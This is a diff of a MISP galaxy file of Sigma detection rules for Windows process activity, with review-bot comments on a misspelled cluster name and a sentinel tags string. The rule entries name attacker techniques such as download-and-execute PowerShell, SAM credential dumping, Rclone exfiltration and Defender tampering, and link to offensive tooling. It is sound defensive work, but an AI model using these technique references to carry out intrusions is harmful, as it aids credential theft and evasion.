Manage-bde.wsf Script" }, 
@@ -33362,9 +42540,52 @@ "attack.t1127" ] }, + "related": [ + { + "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "18749301-f1c5-4efc-a4c3-276ff1f5b6f8", "value": "Use of VSIISExeLauncher.exe" }, + { + "description": "Detect execution of suspicious double extension files in ParentCommandLine", + "meta": { + "author": "frack113", + "creation_date": "2023/01/06", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_double_ext_parent.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.virustotal.com/gui/file/7872d8845a332dce517adae9c3389fde5313ff2fed38c2577f3b498da786db68/behavior", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_double_ext_parent.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.007" + ] + }, + "related": [ + { + "dest-uuid": "11f29a39-0942-4d62-92b6-fe236cf3066e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "5e6a80c8-2d45-4633-9ef4-fa2671a39c5c", + "value": "Suspicious Double File Extention in ParentCommandLine" + }, { "description": "This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", "meta": { 
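Review bot: The new cluster's `value`, `"Suspicious Double File Extention in ParentCommandLine"`, misspells "Extension"; because `value` becomes the galaxy tag that users select and match on, a misspelling is awkward to correct once it has been attached to events. If the generator copies the Sigma rule title verbatim, the fix belongs upstream in the rule with the cluster regenerated from it; otherwise change the line to `"value": "Suspicious Double File Extension in ParentCommandLine"`. The `creation_date` is written as `2023/01/06`, which matches the file's other entries, so leave that format alone unless the whole cluster moves to ISO 8601.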
@@ -33378,9 +42599,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/sql/tools/sqlps-utility?view=sql-server-ver15", - "https://twitter.com/bryon_/status/975835709587075072", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/", + "https://twitter.com/bryon_/status/975835709587075072", + "https://docs.microsoft.com/en-us/sql/tools/sqlps-utility?view=sql-server-ver15", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_sqlps_bin.yml" ], "tags": [ @@ -33390,6 +42611,22 @@ "attack.t1127" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0152550d-3a26-4efd-9f0e-54a0b28ae2f3", "value": "Detection of PowerShell Execution via Sqlps.exe" }, @@ -33414,6 +42651,15 @@ "attack.t1548" ] }, + "related": [ + { + "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d522eca2-2973-4391-a3e0-ef0374321dae", "value": "Abused Debug Privilege by Arbitrary Parent Processes" }, @@ -33440,6 +42686,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e1561947-b4e3-4a74-9bdd-83baed21bdb5", "value": "Invoke-Obfuscation Via Use Clip" }, 
@@ -33464,6 +42719,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1c8774a0-44d4-4db0-91f8-e792359c70bd", "value": "REGISTER_APP.VBS Proxy Execution" }, @@ -33488,6 +42752,15 @@ "attack.t1202" ] }, + "related": [ + { + "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "883faa95-175a-4e22-8181-e5761aeb373c", "value": "Suspicious Service Binary Directory" }, @@ -33528,8 +42801,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.virustotal.com/gui/search/metadata%253ACube0x0/files", "https://github.com/cube0x0", + "https://www.virustotal.com/gui/search/metadata%253ACube0x0/files", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_cube0x0_tools.yml" ], "tags": "No established tags" @@ -33559,6 +42832,15 @@ "attack.t1559" ] }, + "related": [ + { + "dest-uuid": "acd0ba37-7ba9-4cc5-ac61-796586cd856d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27", "value": "Trickbot Malware Activity" }, 
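Review bot: In the Cube0x0 tools hunk the entry keeps `"tags": "No established tags"`, a sentinel string, while every neighbouring entry's `tags` is an array of `attack.*` strings, so consumers must type-check the field before iterating it and a naive `for tag in tags` silently walks characters. Emit `"tags": []` for rules without tags (or omit the key) and keep the sentinel text out of the data. The same sentinel appears in the "susp_parents" and "download_office_domain" hunks below; in all three the entry's `uuid` and `value` lines follow outside the hunk.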
@@ -33575,10 +42857,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Rcsi/", - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/", - "https://twitter.com/Z3Jpa29z/status/1317545798981324801", "https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Rcsi/", + "https://twitter.com/Z3Jpa29z/status/1317545798981324801", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_csi.yml" ], "tags": [ 
@@ -33588,9 +42870,52 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "40b95d31-1afc-469e-8d34-9a3a667d058e", "value": "Suspicious Csi.exe Usage" }, + { + "description": "Detects suspicious powershell invocations from interpreters or unusual programs", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/01/16", + "falsepositive": [ + "Microsoft Operations Manager (MOM)", + "Other scripts" + ], + "filename": "proc_creation_win_susp_powershell_script_engine_parent_.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.securitynewspaper.com/2017/03/20/attackers-leverage-excel-powershell-dns-latest-non-malware-attack/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_script_engine_parent_.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "95eadcb2-92e4-4ed1-9031-92547773a6db", + "value": "Suspicious PowerShell Invocation From Script Engines" + }, { "description": "Detects the execution of a renamed ProcDump executable often used by attackers or malware", "meta": { @@ -33613,6 +42938,15 @@ "attack.t1036.003" ] }, + "related": [ + { + "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67", "value": "Renamed ProcDump Execution" }, 
@@ -33629,14 +42963,23 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.scythe.io/library/threat-emulation-qakbot", "https://thedfirreport.com/2021/12/13/diavol-ransomware/", + "https://www.scythe.io/library/threat-emulation-qakbot", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_not_from_c_drive.yml" ], "tags": [ "attack.t1218.001" ] }, + "related": [ + { + "dest-uuid": "a6937325-9321-4e2e-bb2b-3ed2d40b2a9d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d4ca7c59-e9e4-42d8-bf57-91a776efcb87", "value": "LOLBIN From Abnormal Drive" }, @@ -33662,6 +43005,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0955e4e1-c281-4fb9-9ee1-5ee7b4b754d2", "value": "Use of Pcalua For Execution" }, @@ -33678,8 +43030,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", "https://www.nirsoft.net/utils/nircmd.html", + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", "https://www.nirsoft.net/utils/nircmd2.html#using", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_nircmd.yml" ], 
@@ -33689,11 +43041,20 @@ "attack.s0029" ] }, + "related": [ + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4e2ed651-1906-4a59-a78a-18220fca1b22", "value": "NirCmd Tool Execution" }, { - "description": "Detects suspicious ways to download files or content and execute them using PowerShell", + "description": "Detects suspicious ways to download files or content and execute them using PowerShell Invoke-Expression", "meta": { "author": "Florian Roth", "creation_date": "2022/03/24", @@ -33713,6 +43074,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "85b0b087-eddf-4a2b-b033-d771fa2b9775", "value": "PowerShell Web Download and Execution" }, @@ -33729,8 +43099,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/hostname", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-6---hostname-discovery-windows", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/hostname", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_hostname.yml" ], "tags": [ 
@@ -33754,10 +43124,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://twitter.com/hFireF0X/status/897640081053364225", "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", "https://github.com/hfiref0x/UACME", "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", - "https://twitter.com/hFireF0X/status/897640081053364225", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmstp_com_object_access.yml" ], "tags": [ @@ -33770,6 +43140,22 @@ "car.2019-04-001" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "4cbc6a62-9e34-4f94-8a19-5c1a11392a49", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4b60e6f2-bf39-47b4-b4ea-398e33cfe253", "value": "CMSTP UAC Bypass via COM Object Access" }, @@ -33811,8 +43197,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/x86matthew/status/1505476263464607744?s=12", "https://svch0st.medium.com/stats-from-hunting-cobalt-strike-beacons-c17e56255f9b", + "https://twitter.com/x86matthew/status/1505476263464607744?s=12", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_parents.yml" ], "tags": "No established tags" 
@@ -33845,6 +43231,29 @@ "attack.s0106" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "058f4380-962d-40a5-afce-50207d36d7e2", "value": "CrackMapExec Command Execution" }, @@ -33862,9 +43271,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://twitter.com/AdamTheAnalyst/status/1483497517119590403", "https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_exclusion.yml" ], "tags": [ 
@@ -33889,10 +43298,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://techtalk.pcmatic.com/2017/11/30/running-dll-files-malware-analysis/", - "https://github.com/Neo23x0/DLLRunner", - "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/", "https://twitter.com/cyb3rops/status/1186631731543236608", + "https://techtalk.pcmatic.com/2017/11/30/running-dll-files-malware-analysis/", + "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/", + "https://github.com/Neo23x0/DLLRunner", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_by_ordinal.yml" ], "tags": [ @@ -33900,6 +43309,15 @@ "attack.t1218.011" ] }, + "related": [ + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e79a9e79-eb72-4e78-a628-0e7e8f59e89c", "value": "Suspicious Call by Ordinal" }, @@ -33924,6 +43342,15 @@ "attack.t1218.010" ] }, + "related": [ + { + "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "10152a7b-b566-438f-a33c-390b607d1c8d", "value": "Empire Monkey" }, @@ -33950,6 +43377,15 @@ "car.2013-05-009" ] }, + "related": [ + { + "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "18da1007-3f26-470f-875d-f77faf1cab31", "value": "Ps.exe Renamed SysInternals Tool" }, 
@@ -33974,6 +43410,15 @@ "attack.t1127" ] }, + "related": [ + { + "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d047726b-c71c-4048-a99b-2e2f50dc107d", "value": "Kavremover Dropped Binary LOLBIN Usage" }, @@ -34000,6 +43445,15 @@ "attack.t1218.007" ] }, + "related": [ + { + "dest-uuid": "365be77f-fc0e-42ee-bac8-4faf806d9336", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "84f52741-8834-4a8c-a413-2eb2269aa6c8", "value": "Suspicious Msiexec Load DLL" }, @@ -34026,6 +43480,22 @@ "attack.t1202" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "eca49c87-8a75-4f13-9c73-a5a29e845f03", "value": "Suspicious Runscripthelper.exe" }, @@ -34050,6 +43520,15 @@ "attack.t1216" ] }, + "related": [ + { + "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1e0e1a81-e79b-44bc-935b-ddb9c8006b3d", "value": "CL_Mutexverifiers.ps1 Proxy Execution" }, @@ -34075,6 +43554,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "90d50722-0483-4065-8e35-57efaadd354d", "value": "DevInit Lolbin Download" }, 
@@ -34091,8 +43579,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remove_windows_defender_definition_files.yml" ], "tags": [ @@ -34116,8 +43604,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/j0nh4t/status/1429049506021138437", "https://streamable.com/q2dsji", + "https://twitter.com/j0nh4t/status/1429049506021138437", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_razorinstaller_explorer.yml" ], "tags": [ @@ -34125,6 +43613,15 @@ "attack.t1553" ] }, + "related": [ + { + "dest-uuid": "b83e166d-13d7-4b52-8677-dff90c548fd7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a4eaf250-7dc1-4842-862a-5e71cd59a167", "value": "Suspicious RazerInstaller Explorer Subprocess" }, @@ -34148,6 +43645,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "88f680b8-070e-402c-ae11-d2914f2257f1", "value": "Encoded IEX" }, 
@@ -34165,8 +43671,8 @@ "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system", - "https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps", "https://learn.microsoft.com/en-us/windows/wsl/install-on-server", + "https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_windowsoptionalfeature.yml" ], "tags": [ @@ -34197,6 +43703,15 @@ "attack.t1119" ] }, + "related": [ + { + "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "aa2efee7-34dd-446e-8a37-40790a66efd7", "value": "Recon Information for Export with Command Prompt" }, @@ -34223,6 +43738,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "033fe7d6-66d1-4240-ac6b-28908009c71f", "value": "APT29" }, @@ -34275,6 +43799,15 @@ "attack.t1003.002" ] }, + "related": [ + { + "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "038cd51c-3ad8-41c5-ba8f-5d1c92f3cc1e", "value": "Registry Dump of SAM Creds and Secrets" }, 
@@ -34370,8 +43903,8 @@ "refs": [ "https://strontic.github.io/xcyclopedia/library/setres.exe-0E30E4C09637D7A128A37B59A3BC4D09.html", "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)", - "https://lolbas-project.github.io/lolbas/Binaries/Setres/", "https://twitter.com/0gtweet/status/1583356502340870144", + "https://lolbas-project.github.io/lolbas/Binaries/Setres/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_setres.yml" ], "tags": [ @@ -34380,6 +43913,22 @@ "attack.t1202" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "835e75bf-4bfd-47a4-b8a6-b766cac8bcb7", "value": "Use of Setres.exe" }, @@ -34396,10 +43945,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a", "https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html", "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/", + "https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a", "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rclone_execution.yml" ], 
@@ -34408,6 +43957,15 @@ "attack.t1567.002" ] }, + "related": [ + { + "dest-uuid": "bf1b6176-597c-4600-bfcd-ac989670f96b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e37db05d-d1f9-49c8-b464-cee1a4b11638", "value": "Rclone Execution via Command Line or PowerShell" }, @@ -34424,9 +43982,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", - "https://twitter.com/vxunderground/status/1423336151860002816?s=20", "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/", + "https://twitter.com/vxunderground/status/1423336151860002816?s=20", + "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cmd_shadowcopy_access.yml" ], "tags": [ @@ -34434,6 +43992,15 @@ "attack.t1490" ] }, + "related": [ + { + "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c73124a7-3e89-44a3-bdc1-25fe4df754b1", "value": "Copy from Volume Shadow Copy" }, @@ -34450,9 +44017,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://twitter.com/c_APT_ure/status/939475433711722497", "https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html", "https://twitter.com/haroonmeer/status/939099379834658817", - "https://twitter.com/c_APT_ure/status/939475433711722497", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_builtin_commands_recon.yml" ], "tags": [ 
@@ -34511,6 +44078,22 @@ "attack.t1059.007" ] }, + "related": [ + { + "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cea72823-df4d-4567-950c-0b579eaf0846", "value": "WScript or CScript Dropper" }, @@ -34535,6 +44118,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6e968eb1-5f05-4dac-94e9-fd0c5cb49fd6", "value": "Sideloading Link.EXE" }, @@ -34559,6 +44151,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a6a39bdb-935c-4f0a-ab77-35f4bbf44d33", "value": "Suspicious Script Execution From Temp Folder" }, @@ -34585,6 +44186,22 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e32d4572-9826-4738-b651-95fa63747e8a", "value": "FromBase64String Command Line" }, 
@@ -34609,6 +44226,15 @@ "attack.t1219" ] }, + "related": [ + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "065b00ca-5d5c-4557-ac95-64a6d0b64d86", "value": "Use of Anydesk Remote Access Software from Suspicious Folder" }, @@ -34634,6 +44260,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6355a919-2e97-4285-a673-74645566340d", "value": "RdrLeakDiag Process Dump" }, @@ -34662,6 +44297,15 @@ "car.2014-04-003" ] }, + "related": [ + { + "dest-uuid": "840a987a-99bd-4a80-a5c9-0cb2baa6cade", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "03cc0c25-389f-4bf8-b48d-11878079f1ca", "value": "MSHTA Spawning Windows Shell" }, @@ -34686,6 +44330,15 @@ "attack.t1485" ] }, + "related": [ + { + "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4b046706-5789-4673-b111-66f25fe99534", "value": "Overwrite Deleted Data with Cipher" }, @@ -34727,8 +44380,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/an0n_r0/status/1474698356635193346?s=12", "https://twitter.com/mrd0x/status/1475085452784844803?s=12", + "https://twitter.com/an0n_r0/status/1474698356635193346?s=12", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_download_office_domain.yml" ], "tags": "No established tags" 
@@ -34749,8 +44402,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://forensafe.com/blogs/typedpaths.html", "https://twitter.com/dez_/status/1560101453150257154", + "https://forensafe.com/blogs/typedpaths.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_persistence_typed_paths.yml" ], "tags": [ @@ -34781,6 +44434,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9be34ad0-b6a7-4fbd-91cf-fc7ec1047f5f", "value": "UNC2452 Process Creation Patterns" }, @@ -34797,8 +44459,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/swagkarna/Defeat-Defender-V1.2.0", "https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/", + "https://github.com/swagkarna/Defeat-Defender-V1.2.0", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_defender_tampering.yml" ], "tags": [ @@ -34847,8 +44509,8 @@ "logsource.category": "process_creation", 